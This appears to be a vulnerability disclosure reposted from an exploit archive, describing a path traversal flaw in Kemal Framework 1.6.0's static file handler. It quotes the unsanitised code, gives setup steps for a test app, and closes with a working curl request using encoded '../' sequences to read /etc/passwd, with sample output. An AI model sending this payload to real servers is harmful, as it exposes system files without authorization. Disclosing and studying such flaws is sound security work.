Share
## https://sploitus.com/exploit?id=PACKETSTORM:190294
Exploit Title: Kemal Framework 1.6.0 - Path Traversal
Discovered by: Ahmet Γmit BAYRAM
Discovered Date: 04.04.2025
Vendor Homepage: https://github.com/kemalcr
Software Link: https://github.com/kemalcr/kemal/archive/refs/tags/v1.6.0.zip
Tested Version: v1.6.0 (latest)
Tested on: Kali Linux
CVE: (Waiting for response)
𧩠Summary
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-summary>
A *Path Traversal vulnerability* exists in the Kemal::StaticFileHandler
class of *Kemal Framework v1.6.0*. When serving static files from a
user-defined public directory, the framework fails to sanitize malicious ../
sequences in user-supplied URIs. This allows unauthenticated attackers to
access arbitrary files on the server.
π οΈ Affected Version
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#οΈ-affected-version>
- Kemal Framework v1.6.0
π Vulnerable Code
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-vulnerable-code>
In src/kemal/static_file_handler.cr:
request_path = URI.decode(original_path)
file_path = File.join(@public_dir, request_path)
if File.exists?(file_path)
send_file(context, file_path)end
No checks are performed to sanitize or reject traversal sequences (../),
making it possible to access files outside the @public_dir.
π₯ Proof-of-Concept (PoC)
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-proof-of-concept-poc>
β
1. Create a New Kemal Project
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-1-create-a-new-kemal-project>
mkdir kemal-testcd kemal-test
crystal init app .
This command creates a sample Crystal application that includes a shard.yml
file.
------------------------------
β
2. Edit shard.yml File
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-2-edit-shardyml-file>
Edit the shard.yml file as follows:
name: kemal-testversion: 0.1.0
dependencies:
kemal:
github: kemalcr/kemal
------------------------------
β
3. Install the Required Packages
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-3-install-the-required-packages>
shards install
This command downloads and installs Kemal into the lib/ directory.
------------------------------
β
4. Edit src/kemal-test.cr File
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-4-edit-srckemal-testcr-file>
Write the following content:
require "kemal"
get "/" do
"Hello from Kemal!"end
Kemal.config.public_folder = "./public"Kemal.run
------------------------------
β
5. Create public/ directory
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-5-create-public-directory>
mkdir public
------------------------------
β
6. Start the Application
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-6-start-the-application>
crystal run src/kemal-test.cr
Go to the following address in your browser:
http://localhost:3000
If you see "Hello from Kemal!", everything is working perfectly π
------------------------------
β
7. Test the Vulnerability
<https://github.com/ahmetumitbayram/Kemal-Framework-Path-Traversal-Vulnerability-PoC#-7-test-the-vulnerability>
curl "http://localhost:3000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
If successful, the contents of /etc/passwd will be returned as shown below:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...